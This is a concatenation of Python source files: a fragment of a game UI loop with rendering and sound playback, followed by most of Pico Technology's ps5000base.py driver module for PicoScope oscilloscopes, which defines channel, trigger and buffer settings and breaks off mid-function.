1 if not self.use_chip else 0 self.screen = self.mixer = sdlmixer.SDLMixer(480*scale, 272*scale) self.renderer = fontaine.GLTextRenderer(480, 272, os.path.join(os.path.dirname(__file__), 'art', 'pwv.tile')) self.renderer.enable_blending() def ui_loop(self): self.ui_setup() while True: self.render() time.sleep(1./20.) def start(self): self.gameflow = GameFlow(self) def update(self): self.gameflow.update() self.coroutines = [coroutine for coroutine in self.coroutines if coroutine.schedule()] if not self.use_chip: self.render() def render(self): self.renderer.clear(0.0, 0.0, 0.0, 1.0) move_says_choices = ['MoveSaysBlue', 'MoveSaysGreen', 'MoveSaysPurple', 'MoveSaysRed'] move_says_now = move_says_choices[int(time.time())%len(move_says_choices)] game_title, game_description, scores = self.gameflow.status_message() image_name = { 'MoveSays': move_says_now, 'SafeCracker': 'SafeCrackerNormal', 'ShakeIt': 'ShakeIt', 'Freeze': 'Freeze', 'AttractMode': 'ParleyWhoVertigo3', }.get(game_title, 'PWVLogo272') image_id = self.renderer.lookup_image(image_name) self.renderer.render_image(0, 0, 1.0, 0.0, 0xFFFFFFFF, image_id) self.renderer.flush() if not self.use_chip: self.renderer.enqueue(10, 10, 1.0, 0.0, 0x888888FF, game_title) self.renderer.enqueue(10, 20, 1.0, 0.0, 0x888888FF, game_description) self.renderer.enqueue(10, 30, 1.0, 0.0, 0x888888FF, self.gameflow.current_message) self.renderer.flush() if self.eglo is not None: self.eglo.swap_buffers() else: self.screen.update() def start_coroutine(self, crt): self.coroutines.append(Coroutine(crt)) def get_controllers(self): return self.api.connected_controllers def play_sound(self, sound, volume=1.0, pitch=1.0): filename = { 'GameWin1Sound': 'game-win1.wav', 'GameWin2Sound': 'game-win2.wav', 'WinPlayer1Sound': 'win-player1.wav', 'WinPlayer2Sound': 'win-player2.wav', 'ReadySound': 'ready.wav', 'CycleBlipSound': 'cycle-blip.wav', 'BeepSound': 'beep.wav', 'BadBeepSound': 'bad-beep.wav', 'SafeAnnounceSound': 'safe-announce.wav', 'SafeClickSound': 'safe-click.wav', 'BalloonAnnounceSound': 'balloon-announce.wav', 'BalloonExplosionSound': 'balloon-explosion.wav', 'SqueakSound': 'squeak.wav', }[sound] if filename not in self.sounds: self.sounds[filename] = self.mixer.load(os.path.join(os.path.dirname(__file__), 'sounds', filename)) self.sounds[filename].play()
ps5000base.py
# -*- coding: utf-8 -*- # # Copyright (C) 2014-2017 Pico Technology Ltd. See LICENSE file for terms. # """ Python calls for ps5000 based PicoScope devices. """ from threading import * from picostatus import * from psutils import * from math import ceil from copy import deepcopy import numpy as np import sys import time """ Defaults """ MAX_INFO_LEN = 64 MAX_NUM_DEVICES = 64 MAX_LOGIC_LEVEL = 32767 MIN_LOGIC_LEVEL = -32767 MAX_LOGIC_VOLTS = 5 STREAM_LENGTH = 1000000 class UnitInfo(dict2class): """ Place holder type for device information """ pass class Channels(dict2class): """ Class defining channels for the current device class """ A = 0 B = 1 C = 2 D = 3 map = (A, B, C, D) labels = {A: "A", B: "B", C: "C", D: "D"} class ChannelState(dict2class): """ Object describing state of the channel """ def __init__(self): self.enabled = False self.coupling = Couplings.dc self.range = Ranges.r500mv self.offset = 0 self.overvoltaged = False class Couplings(dict2class): """ Couplings selection """ ac = 0 dc = 1 labels = {ac: "AC", dc: "DC"} class Ports(dict2class): """ Device digital ports selection """ p0 = 0x80 p1 = 0x81 p2 = 0x82 p3 = 0x83 map = (p0, p1, p2, p3) labels = {p0: "p0", p1: "p1", p2: "p2", p3: "p3"} class PortState(dict2class): """ Object describing state of the digital port """ def __init__(self): self.enabled = False self.level = 0 class PortBits(dict2class): """ Bits numbers used in MSO collections """ b0 = 0 b1 = 1 b2 = 2 b3 = 3 b4 = 4 b5 = 5 b6 = 6 b7 = 7 b8 = 8 b9 = 9 b10 = 10 b11 = 11 b12 = 12 b13 = 13 b14 = 14 b15 = 15 b16 = 16 b17 = 17 b18 = 18 b19 = 19 b20 = 20 b21 = 21 b22 = 22 b23 = 23 b24 = 24 b25 = 25 b26 = 26 b27 = 27 b28 = 28 b29 = 29 b30 = 30 b31 = 31 map = ((b0, b1, b3, b3, b4, b5, b6, b7), (b8, b9, b10, b11, b12, b13, b14, b15), (b16, b17, b18, b19, b20, b21, b22, b23), (b24, b25, b26, b27, b28, b29, b30, b31)) portmap = { Ports.p0: (b0, b1, b3, b3, b4, b5, b6, b7), Ports.p1: (b8, b9, b10, b11, b12, b13, b14, b15), Ports.p2: (b16, b17, b18, b19, b20, b21, b22, b23), Ports.p3: (b24, b25, b26, b27, b28, b29, b30, b31) } labels = {0: "b0", 1: "b1", 2: "b2", 3: "b3", 4: "b4", 5: "b5", 6: "b6", 7: "b7", 8: "b8", 9: "b9", 10: "b10", 11: "b11", 12: "b12", 13: "b13", 14: "b14", 15: "b15", 16: "b16", 17: "b17", 18: "b18", 19: "b19", 20: "b20", 21: "b21", 22: "b22", 23: "b23", 24: "b24", 25: "b25", 26: "b26", 27: "b27", 28: "b28", 29: "b29", 30: "b30", 31: "b31"} class Ranges(dict2class): """ Universal class with channel ranges """ r10mv = 0 r20mv = 1 r50mv = 2 r100mv = 3 r200mv = 4 r500mv = 5 r1v = 6 r2v = 7 r5v = 8 r10v = 9 r20v = 10 r50v = 11 r100v = 12 r200v = 13 r400v = 14 map = (r10mv, r20mv, r50mv, r100mv, r200mv, r500mv, r1v, r2v, r5v, r10v, r20v, r50v, r100v, r200v, r400v) labels = {r10mv: "\26110mV", r20mv: "\26120mV", r50mv: "\26150mV", r100mv: "\261100mV", r200mv: "\261200mV", r500mv: "\261500mV", r1v: "\2611V", r2v: "\2612V", r5v: "\2615V", r10v: "\26110V", r20v: "\26120V", r50v: "\26150V", r100v: "\261100V", r200v: "\261200V", r400v: "\261400V"} values = {r10mv: 0.01, r20mv: 0.02, r50mv: 0.05, r100mv: 0.1, r200mv: 0.2, r500mv: 0.5, r1v: 1.0, r2v: 2.0, r5v: 5.0, r10v: 10.0, r20v: 20.0, r50v: 50.0, r100v: 100.0, r200v: 200.0, r400v: 400.0} ascii_labels = {r10mv: "+/-10mV", r20mv: "+/-20mV", r50mv: "+/-50mV", r100mv: "+/-100mV", r200mv: "+/-200mV", r500mv: "+/-500mV", r1v: "+/-1V", r2v: "+/-2V", r5v: "+/-5V", r10v: "+/-10V", r20v: "+/-20V", r50v: "+/-50V", r100v: "+/-100V", r200v: "+/-200V", r400v: "+/-400V"} class RatioModes(dict2class): """ Collection of reduction modes """ raw = 0 none = raw agg = 1 aggregate = agg dec = 2 decimate = dec avg = 4 average = avg map = (raw, agg, dec, avg) labels = {raw: "raw", agg: "agg", dec: "dec", avg: "avg"} @staticmethod def mode2dict(mode): """ Returns dict of matched modes :param mode: OR-ed modes selection :type mode: int :return: dict of valid labels with enum values :rtype: dict """ r = {} for m in RatioModes.labels: if mode == m: return {RatioModes.labels[m]: m} if mode & m > 0: r[RatioModes.labels[m]] = m return r @staticmethod def isvalid(mode): """ Quick test, whether provided mode is a valid one :param mode: OR-ed modes selection to validate :type mode: int :return: if valid :rtype: bool """ return len(RatioModes.mode2dict(mode)) > 0 @staticmethod def issingle(mode): return mode in RatioModes.labels.keys() class BufferInfo(dict2class): """ Type specifier for Block Buffer structure """ def __init__(self): self.access_lock = Lock() class ThresholdModes(dict2class): """ Simple trigger threshold collection """ lvl = 0 level = lvl win = 1 window = win map = (lvl, win) labels = {lvl: "level", win: "window"} class SweepTypes(dict2class): """ Collection of Sweep Types in Simple Signal Generator """ up = 0 down = 1 updown = 2 downup = 3 map = (up, down, updown, downup) labels = {up: "up", down: "down", updown: "updown", downup: "downup"} class WaveTypes(dict2class): """ Collection of Waveform Types for Simple Signal Generator """ sine = 0 square = 1 triangle = 2 ramp_up = 3 ramp_down = 4 sinc = 5 gaussian = 6 half_sine = 7 dc = 8 map = (sine, square, triangle, ramp_up, ramp_down, sinc, gaussian, half_sine, dc) labels = {sine: "sine", square: "square", triangle: "triangle", ramp_up: "ramp up", ramp_down: "ramp down", sinc: "sinc", gaussian: "gaussian", half_sine: "half sine", dc: "DC"} class SigExtra(dict2class): """ Collection of additionall parameters for Advanced Signal Generator """ off = 0 white_noise = 1 wnoise = white_noise prbs = 2 map = (off, wnoise, prbs) labels = {off: "off", wnoise: "white noise", prbs: "PRBS"} class SigTriggerTypes(dict2class): """ Collection of Trigger Types for Advanced Signal Generator """ rising = 0 falling = 1 gate_high = 2 gate_low = 3 map = (rising, falling, gate_high, gate_low) labels = {rising: "rising", falling: "falling", gate_high: "gate high", gate_low: "gate low"} class SigTriggerSource(dict2class): """ Collection of Trigger Sources for Advanced Signal Generator """ none = 0 scope = 1 aux = 2 ext = 3 soft = 4 map = (none, scope, aux, ext, soft) labels = {none: "none", scope: "scope", aux: "aux in", ext: "ext in", soft: "software"} class IndexModes(dict2class): """ Collection of Index Modes for AWG operation """ single = 0 dual = 1 quad = 2 map = (single, dual, quad) labels = {single: "single", dual: "dual", quad: "quad"} values = {single: 1, dual: 2, quad: 4} class TriggerChannels(dict2class): """ Collection of channels used in triggering """ A = Channels.A B = Channels.B C = Channels.C D = Channels.D Ext = 4 Aux = 5 map = (A, B, C, D, Ext, Aux) labels = {A: "A", B: "B", C: "C", D: "D", Ext: "EXT", Aux: "AUX"} class ThresholdDirections(dict2class): """ Collection of Trigger Directions for Advanced Triggers """ above = 0 inside = above below = 1 outside = below rising = 2 enter = rising none = rising falling = 3 exit = falling rising_or_falling = 4 enter_or_exit = rising_or_falling above_lower = 5 below_lower = 6 rising_lower = 7 falling_lower = 8 positive_runt = 9 negative_runt = 10 map = (above, below, rising, falling, rising_or_falling, above_lower, below_lower, rising_lower, falling_lower, positive_runt, negative_runt) simple = (above, below, rising, falling) labels = {above: "above", below: "below", rising: "rising", falling: "falling", rising_or_falling: "rise/fall", above_lower: "above/low", below_lower: "below/low", rising_lower: "rise/low", falling_lower: "fall/low", positive_runt: "pos runt", negative_runt: "neg runt"} class DigitalDirections(dict2class): """ Collection of Trigger Directions for Digital Triggers """ dont_care = 0 low = 1 high = 2 rising = 3 falling = 4 rising_or_falling = 5 map = (dont_care, low, high, rising, falling, rising_or_falling) labels = {dont_care: "don't care", low: "low", high: "high", rising: "rising", falling: "falling", rising_or_falling: "rise/fall"} class TriggerChannelDirections(dict2class): """ container for channel directions """ def __init__(self, *args, **kwargs): for c in TriggerChannels.map: self.__dict__[TriggerChannels.labels[c]] = ThresholdDirections.none self.update(*args, **kwargs) class TriggerState(dict2class): """ Collection of Trigger states for Advanced Triggers """ dont_care = 0 true = 1 false = 2 map = (dont_care, true, false) labels = {dont_care: "don't care", true: "true", false: "false"} class TriggerConditionsStruct(Structure): """ CType specifier for Trigger Conditions """ _fields_ = [ ("chA", c_int32), ("chB", c_int32), ("chC", c_int32), ("chD", c_int32), ("ext", c_int32), ("aux", c_int32), ("pwq", c_int32), ("dig", c_int32), ] _pack_ = 1 class TriggerConditions(dict2class): """ Collection of Trigger Conditions for Advanced Triggering """ chA = TriggerState.dont_care chB = TriggerState.dont_care chC = TriggerState.dont_care chD = TriggerState.dont_care ext = TriggerState.dont_care aux = TriggerState.dont_care pwq = TriggerState.dont_care dig = TriggerState.dont_care def __init__(self, *args, **kwargs): self.update(*args, **kwargs) def to_struct(self): return TriggerConditionsStruct(self.chA, self.chB, self.chC, self.chD, self.ext, self.aux, self.pwq, self.dig) def is_set(self): return len([c for c in (self.chA, self.chB, self.chC, self.chD, self.ext, self.aux, self.pwq, self.dig) if c != TriggerState.dont_care]) > 0 class PwqConditionsStruct(Structure): """ CType specifier for Pulse Width Qualifier Conditions """ _fields_ = [ ("chA", c_int32), ("chB", c_int32), ("chC", c_int32), ("chD", c_int32), ("ext", c_int32), ("aux", c_int32), ("dig", c_int32), ] _pack_ = 1 class PwqConditions(dict2class): """ Collection of Pulse Width Qualifier Conditions """ chA = TriggerState.dont_care chB = TriggerState.dont_care chC = TriggerState.dont_care chD = TriggerState.dont_care ext = TriggerState.dont_care aux = TriggerState.dont_care dig = TriggerState.dont_care def __init__(self, *args, **kwargs): self.update(*args, **kwargs) def to_struct(self): return PwqConditionsStruct(self.chA, self.chB, self.chC, self.chD, self.ext, self.aux, self.dig) def is_set(self): return len([c for c in (self.chA, self.chB, self.chC, self.chD, self.ext, self.aux, self.dig) if c != TriggerState.dont_care] ) > 0 class PwqTypes(dict2class): """ Collection of Pulse Width Qualifier types """ none = 0 less_than = 1 lt = less_than greater_than = 2 gt = greater_than in_range = 3 inside = in_range out_of_range = 4 outside = out_of_range map = (none, lt, gt, inside, outside) labels = {none: "None", lt: "Less Than", gt: "Greater Than", inside: "Inside", outside: "Outside"} class DigitalChannelDirectionStruct(Structure): """ CType specifier for Digital triggers """ _fields_ = [ ("portbit", c_int32), ("direction", c_int32) ] _pack_ = 1 class TriggerChannelPropertiesStruct(Structure): """ CType specifier for Trigger Channel Properties in Advanced Triggers """ _fields_ = [ ("threshUpperADC", c_int16), ("threshUpperHys", c_uint16), ("threshLowerADC", c_int16), ("threshLowerHys", c_uint16), ("channel", c_int32), ("threshMode", c_int32) ] _pack_ = 1 class TriggerChannelProperties(dict2class): """ Object describing single Channel Trigger Properties in Advanced Triggers """ threshUpperADC = 0.2 threshUpperHys = 32767 threshLowerADC = -32767 threshLowerHys = 0 threshMode = ThresholdModes.level direction = ThresholdDirections.none def __init__(self, channel, *args, **kwargs): self.channel = channel self.update(self, *args, **kwargs) def to_struct(self): """ Translate object to ctypes structure :return: object """ return TriggerChannelPropertiesStruct(self.threshUpperADC, self.threshUpperHys, self.threshLowerADC, self.threshLowerHys, self.channel, self.threshMode) class ETSModes(dict2class): """ Collection of ETS modes """ off = 0 fast = 1 slow = 2 max = 3 map = (off, fast, slow, max) labels = {off: "off", fast: "fast", slow: "slow", max: "max"} class TimeUnits(dict2class): """ Collection of Time Units used in Timebase calculations """ fs = 0 ps = 1 ns = 2 us = 3 ms = 4 s = 5 max = 6 map = (fs, ps, ns, us, ms, s) labels = {fs: "fs", ps: "ps", ns: "ns", us: "μs", ms: "ms", s: "s"} ascii_labels = {fs: "fs", ps: "ps", ns: "ns", us: "us", ms: "ms", s: "s"} @staticmethod def nanofactors(unit): """ Returns power factor to bring interval value to nanoseconds """ factor = -6 for u in TimeUnits.map: if u != unit: factor += 3 else: break return factor @staticmethod def secfactors(unit): """ Returns power factor to bring interval value to seconds """ factor = 15 for u in TimeUnits.map: if u != unit: factor -= 3 else: break return factor @staticmethod def multiplier(f, t): """ Returns multiplier for bringing time value from one unit to another :param f: from units enum :type f: int :param t: to units enum :type t: int :return: multiplier :rtype : float """ if f not in TimeUnits.map or t not in TimeUnits.map: return 0 if f > t: return 1.0 * pow(10, (f - t) * 3) elif f < t: return 1.0 / pow(10, (t - f) * 3) else: return 1.0 ldlib = object() class PS5000Device(object): def __init__(self, libobj): if not hasattr(self, "m"): self.m = sys.modules[__name__] raise NotImplementedError("Driver Module reference not set") self._handle = 0 self._chandle = c_int16(0) self._channel_set = {} self._port_set = {} self.info = self.m.UnitInfo() self.trigger = False self.trigg_source = self.m.Channels.A self.trigg_threshold = 0.0 self.trigg_direction = self.m.ThresholdDirections.rising self.trigg_ratio = 0.5 self.trigg_wait = 0 self.trigger_conditions = () self.trigger_analog = () self.trigger_digital = () self.pwq_conditions = () self.pwq_direction = self.m.ThresholdDirections.rising self.pwq_lower = 0 self.pwq_upper = 0 self.pwq_type = self.m.PwqTypes.none self._ets = dict2class() self._ets.mode = self.m.ETSModes.off self._ets.last = self.m.ETSModes.off self._ets.cycles = 0 self._ets.interleaves = 0 self._ets.picos = 0.0 self._ets.status = pico_num("PICO_OK") self._ets.time = None self._segments = 0 self._start_segment = None self._stop_segment = None self._bulk_indexes = () self._collect_indexes = None self._collect_event = Event() if self._collect_event.is_set(): self._collect_event.clear() self._collect_cb_type = None self._collect_cb_func = None self._tape = None self._records = None self._leavers = None self._recording_thread = None self._recording_lock = Lock() if self._recording_lock.acquire(False): self._recording_lock.release() self._recording_event = Event() if self._recording_event.is_set(): self._recording_event.clear() self._async_lock = Lock() if self._async_lock.acquire(False): self._async_lock.release() self._async_event = Event() if self._async_event.is_set(): self._async_event.clear() self._async_cb_type = None self._async_cb_func = None self._overlapped_samples = c_uint32(0) self._overlapped_ov = None self.last_error = None global ldlib ldlib = libobj def open_unit(self, serial=None): """ Opens unit :param serial: string specifying device serial and batch :type serial: string :returns: status of the call :rtype: int """ """ Only one unit allowed per instance """ if self._handle > 0: """ same will occur if 64 devices are opened... unlikely""" return pico_num("PICO_MAX_UNITS_OPENED") try: status = ldlib.OpenUnit(byref(self._chandle), c_char_p(serial)) except AttributeError: return pico_num("PICO_NOT_FOUND") self._handle = self._chandle.value """ Read INFO from device, populate self.info """ if status == pico_num("PICO_OK"): self.info.handle = self._handle status = self._set_info() if status == pico_num("PICO_OK"): """ Set device defaults """ status = self.set_defaults() return status def _set_info(self): """ Pulls information from the driver to info class :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") for tag in ("DRIVER_VERSION", "USB_VERSION", "HARDWARE_VERSION", "VARIANT_INFO", "BATCH_AND_SERIAL", "CAL_DATE", "FIRMWARE_VERSION_1", "FIRMWARE_VERSION_2"): self.info[tag.lower()] = None line = create_string_buffer("\0", MAX_INFO_LEN) required = c_int16() if ("PICO_%s" % tag) in PICO_INFO: status = ldlib.GetUnitInfo(self._chandle, line, c_int16(MAX_INFO_LEN), byref(required), c_uint32(PICO_INFO["PICO_%s" % tag])) if status == pico_num("PICO_OK"): self.info[tag.lower()] = line.value if self.info.variant_info is not None: status = self._set_variant_info() else: status = pico_num("PICO_INFO_UNAVAILABLE") if status == pico_num("PICO_OK"): status = self._set_memory_info() if status != pico_num("PICO_OK"): return status self.info.channel_ranges = dict2class() inner = False outer = False max_offset = c_float(0) min_offset = c_float(0) for i in self.m.Ranges.map: if not inner and i == self.info.min_range: inner = True if not outer and i > self.info.max_range: outer = True if not inner or outer: continue r = dict2class() r.label = self.m.Ranges.labels[i] r.value = self.m.Ranges.values[i] r.ascii_label = self.m.Ranges.ascii_labels[i] r.enum = i if hasattr(ldlib, "GetAnalogueOffset"): # dc status = ldlib.GetAnalogueOffset(self._chandle, r.enum, self.m.Couplings.dc, byref(max_offset), byref(min_offset)) if status == pico_num("PICO_OK"): r.max_dc_offset = max_offset.value r.min_dc_offset = min_offset.value else: r.max_dc_offset = None r.min_dc_offset = None # ac status = ldlib.GetAnalogueOffset(self._chandle, r.enum, self.m.Couplings.ac, byref(max_offset), byref(min_offset)) if status == pico_num("PICO_OK"): r.max_ac_offset = max_offset.value r.min_ac_offset = min_offset.value else: r.max_ac_offset = None r.min_ac_offset = None else: r.max_dc_offset = None r.min_dc_offset = None r.max_ac_offset = None r.min_ac_offset = None self.info.channel_ranges[i] = r if hasattr(ldlib, "MinimumValue") and hasattr(ldlib, "MaximumValue"): limit = c_int16(0) status = ldlib.MinimumValue(self._chandle, byref(limit)) if status == pico_num("PICO_OK"): self.info.min_adc = limit.value else: self.info.min_adc = None status = ldlib.MaximumValue(self._chandle, byref(limit)) if status == pico_num("PICO_OK"): self.info.max_adc = limit.value else: self.info.max_adc = None else: self.info.min_adc = -32512 self.info.max_adc = 32512 if hasattr(ldlib, "SigGenArbitraryMinMaxValues"): minv = c_int16(0) maxv = c_int16(0) mins = c_uint32(0) maxs = c_uint32(0) status = ldlib.SigGenArbitraryMinMaxValues(self._chandle, byref(minv), byref(maxv), byref(mins), byref(maxs)) if status == pico_num("PICO_OK"): self.info.awg_min = minv.value self.info.awg_max = maxv.value self.info.awg_size = maxs.value else: self.info.awg_min = -32767 self.info.awg_max = 32768 return pico_num("PICO_OK") def _set_memory_info(self): """ Sets initial memory setup :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") self._buffers = {} self._segments = 1 mem = c_int32() status = self._memory_segments(self._segments, byref(mem)) self.info.memory = mem.value self.info.memps = mem.value if status == pico_num("PICO_OK"): seg = c_uint32() status = ldlib.GetMaxSegments(self._chandle, byref(seg)) self.info.max_segments = seg.value return status def _set_variant_info(self): """ Sets device variant specific properties :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if not hasattr(self.info, "variant_info") or self.info.variant_info is None: return pico_num("PICO_INFO_UNAVAILABLE") """ each subclass should have its own override """ return pico_num("PICO_INFO_UNAVAILABLE") def set_defaults(self): """ Sets device into default state Each subclass should have its own implementation :returns: status of subsequent calls :rtype: int """ return pico_num("PICO_INFO_UNAVAILABLE") def flash_led(self, count=1): """ Flashes device's LED count times :param count: number of flashes :type count: int :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") return ldlib.FlashLed(self._chandle, c_int16(count)) def set_channel(self, channel, state): """ Sets device's selected channel into requested state :param channel: channel number as in Channels :type channel: int :param state: ChannelState object with desired setup :type state: ChannelState :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if not isinstance(state, self.m.ChannelState): return pico_num("PICO_INVALID_PARAMETER") status = ldlib.SetChannel(self._chandle, c_int32(channel), c_int16(state.enabled), c_int32(state.coupling), c_int32(state.range), c_float(state.offset)) if status == pico_num("PICO_OK"): state.overvoltaged = False self._channel_set[channel] = deepcopy(state) return status def get_channel_state(self, channel): """ Returns current ChannelState object describing channel :param channel: channel number as in Channels :type channel: int :returns: state of the channel :rtype: ChannelState """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None if channel not in self._channel_set.keys(): return pico_num("PICO_INVALID_CHANNEL"), None return pico_num("PICO_OK"), deepcopy(self._channel_set[channel]) def is_channel_overvoltaged(self, channel): """ Checks if channel is overvoltaged after latest collection Will return False when parameters check fails. :param channel: channel number as in Channels :type channel: int :returns: overvoltage check result :rtype: bool """ if self._handle <= 0 or channel not in self._channel_set.keys(): return False return self._channel_set[channel].overvoltaged def increase_channel_range(self, channel, step=1): """ Increase channel range setting by number of steps. If step <= 0 - set maximum available range :param channel: channel number as in Channels :type channel: int :param step: number of ranges to increase by :rtype step: int :returns: status of subsequent calls :rtype: int """ status, state = self.get_channel_state(channel) if status != pico_num("PICO_OK"): return status if state is None: return pico_num("PICO_INVALID_STATE") if state.range == self.info.max_range: return pico_num("PICO_OK") if step <= 0: state.range = self.info.max_range else: for r in self.m.Ranges.map: if r > state.range: step -= 1 if step == 0 or r == self.info.max_range: break else: r = None state.range = r return self.set_channel(channel, state) def decrease_channel_range(self, channel, step=1): """ Decrease channel range setting by number of steps. If step <= 0 - set minimum available range :param channel: channel number as in Channels :type channel: int :param step: number of ranges to decrease by :rtype step: int :returns: status of subsequent calls :rtype: int """ status, state = self.get_channel_state(channel) if status != pico_num("PICO_OK"): return status if state is None: return pico_num("PICO_INVALID_STATE") if state.range == self.info.min_range: return pico_num("PICO_OK") if step <= 0: state.range = self.info.min_range else: rangelist = self.m.Ranges.map rangelist.reverse() for r in rangelist: if r < state.range: step -= 1 if step == 0 or r == self.info.min_range: break else: r = None state.range = r return self.set_channel(channel, state) def set_digital_port(self, port, state): """ Sets properties of digital ports :param port: Port enum as in Ports :type port: int :param state: desired PortState of requested port :type state: PortState :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self.info.num_ports == 0: return pico_num("PICO_NOT_SUPPORTED_BY_THIS_DEVICE") if not isinstance(state, self.m.PortState): return pico_num("PICO_INVALID_PARAMETER") adc_level = int(state.level / MAX_LOGIC_VOLTS * MAX_LOGIC_LEVEL) adc_level = MAX_LOGIC_LEVEL if adc_level > MAX_LOGIC_LEVEL \ else MIN_LOGIC_LEVEL if adc_level < MIN_LOGIC_LEVEL \ else adc_level status = ldlib.SetDigitalPort(self._chandle, c_int32(port), c_int16(state.enabled), c_int16(adc_level)) if status == pico_num("PICO_OK"): self._port_set[port] = deepcopy(state) return status def get_digital_port_state(self, port): """ Returns current PortState object describing port :param port: portn enum as in Ports :type port: int :returns: state of the channel :rtype: PortState """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None if self.info.num_ports == 0: return pico_num("PICO_NOT_SUPPORTED_BY_THIS_DEVICE"), None if port not in self._port_set: return pico_num("PICO_INVALID_DIGITAL_PORT"), None return pico_num("PICO_OK"), deepcopy(self._port_set[port]) def get_basic_interval(self, timebase): """ Return Device interval for given timebase :param timebase: timebase value :type timebase: int :returns: status of the calls, interval value :rtype: int, float """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None interval = c_float() status = self._get_timebase(timebase=timebase, samples=1, ref_interval=byref(interval), oversample=0, ref_maxsamples=None, segment=0) return status, interval.value def _get_timebase(self, timebase, samples, ref_interval, oversample, ref_maxsamples, segment): return ldlib.GetTimebase(self._chandle, c_uint32(timebase), c_int32(samples), ref_interval, c_int16(oversample), ref_maxsamples, c_uint32(segment)) def set_memory_segments(self, segments): """ Sets number of memory segments and returns number of available samples per segment Will release all allocated buffers. :param segments: number of segments to set up :type segments: int :returns status of the calls, number of available samples per segment :rtype: int, int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), 0 """ Do not break data collection if its ongoing """ for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY"), None if segments > self.info.max_segments: return pico_num("PICO_TOO_MANY_SEGMENTS"), 0 if segments == 0: return pico_num("PICO_NOT_ENOUGH_SEGMENTS"), 0 mem = c_int32() status = self._memory_segments(segments, byref(mem)) if status == pico_num("PICO_OK"): self._segments = segments self.info.memps = mem.value return status, mem.value return status, 0 def _memory_segments(self, segments, ref_mem): return ldlib.MemorySegments(self._chandle, c_uint32(segments), ref_mem) def locate_buffer(self, channel, samples, segment, mode, downsample, index=None): """ Locates/Creates internal buffer and returns stack index of it. :param channel: channel or port as in Channels or Ports :type channel: int :param samples: desired length of the buffer, after data reduction :type samples: int :param segment: corresponding memory segment number for the buffer :type segment: int :param mode: unmasked aka single data reduction mode as in RatioModes :type mode: int :param downsample: data reduction ratio :type downsample: int :param index: optional desired index number, if setting match existing - ignored :type index: int :returns: status of the calls, assigned index number :rtype: tuple(int, int) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None """ validate channels """ if channel not in (self._channel_set.keys() + self._port_set.keys()): if channel < self.m.Ports.p0: return pico_num("PICO_INVALID_CHANNEL"), None else: return pico_num("PICO_INVALID_DIGITAL_PORT"), None """ validate segments """ if segment > self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE"), None """ validate mode """ if not self.m.RatioModes.issingle(mode): return pico_num("PICO_RATIO_MODE_NOT_SUPPORTED"), None """ check if buffer of same spec / index exists """ save_index = None if index is not None: if index in self._buffers: return self._reshape_buffer(index, channel, samples, segment, mode, downsample), index else: save_index = index """ check if buffer of given channel, segment and mode exists """ for index in self._buffers.keys(): if self._buffers[index].channel == channel \ and self._buffers[index].segment == segment and self._buffers[index].mode == mode: if save_index is not None: self._buffers[save_index] = self._buffers.pop(index) index = save_index return self._reshape_buffer(index, channel, samples, segment, mode, downsample), index """ allocate/recycle new index """ if save_index is None: index = 0 for i in self._buffers.keys(): if i == index: index += 1 else: break else: index = save_index """ allocate new buffer """ self._buffers[index] = self.m.BufferInfo() with self._buffers[index].access_lock: self._buffers[index].inuse = Lock() self._buffers[index].data = None self._buffers[index].data_min = None self._buffers[index].channel = channel self._buffers[index].samples = samples self._buffers[index].segment = segment self._buffers[index].mode = mode self._buffers[index].downsample = downsample self._buffers[index].last_interval = None self._buffers[index].last_timebase = None self._buffers[index].real_interval = None return pico_num("PICO_OK"), index def locate_buffers(self, channel, samples, start_segment, stop_segment, mode, downsample): """ Locates/Creates internal buffers and returns stack index of it. :param channel: channel or port as in Channels or Ports :type channel: int :param samples: desired length of the buffer, after data reduction :type samples: int :param start_segment: memory segment number from :type start_segment: int :param stop_segment: memory segment number to :type stop_segment: int :param mode: unmasked aka single data reduction mode as in RatioModes :type mode: int :param downsample: data reduction ratio :type downsample: int :returns: status of the calls, assigned index numbers in the form of tuple :rtype: tuple(int, tuple()) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), () if start_segment > self._segments or stop_segment >= self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE"), () if start_segment > stop_segment: segments = range(start_segment, self._segments) + range(0, stop_segment + 1) else: segments = range(start_segment, stop_segment + 1) indexes = () for segment in segments: status, number = self.locate_buffer(channel, samples, segment, mode, downsample) if status != pico_num("PICO_OK"): return status, indexes indexes += (number,) return pico_num("PICO_OK"), indexes def _reshape_buffer(self, index, channel, samples, segment, mode, downsample): """ Changes buffer properties to match specified """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") with self._buffers[index].access_lock: """ check if there is really anything to change """ if self._buffers[index].channel == channel \ and self._buffers[index].samples == samples \ and self._buffers[index].segment == segment \ and self._buffers[index].mode == mode \ and (mode == self.m.RatioModes.none or self._buffers[index].downsample == downsample): return pico_num("PICO_OK") """ resize buffers if needed """ if self._buffers[index].samples != samples: self._buffers[index].data = None self._buffers[index].data_min = None self._buffers[index].channel = channel self._buffers[index].samples = samples self._buffers[index].segment = segment self._buffers[index].mode = mode self._buffers[index].downsample = downsample return pico_num("PICO_OK") def _set_data_buffers(self, line, buffer_max, buffer_min, bufflen, segment, mode): return ldlib.SetDataBuffers(self._chandle, c_int32(line), buffer_max, buffer_min, c_int32(bufflen), c_uint32(segment), c_int32(mode)) def _lock_buffer(self, index): """ Tries to acquire internal lock for the buffer """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") try: with 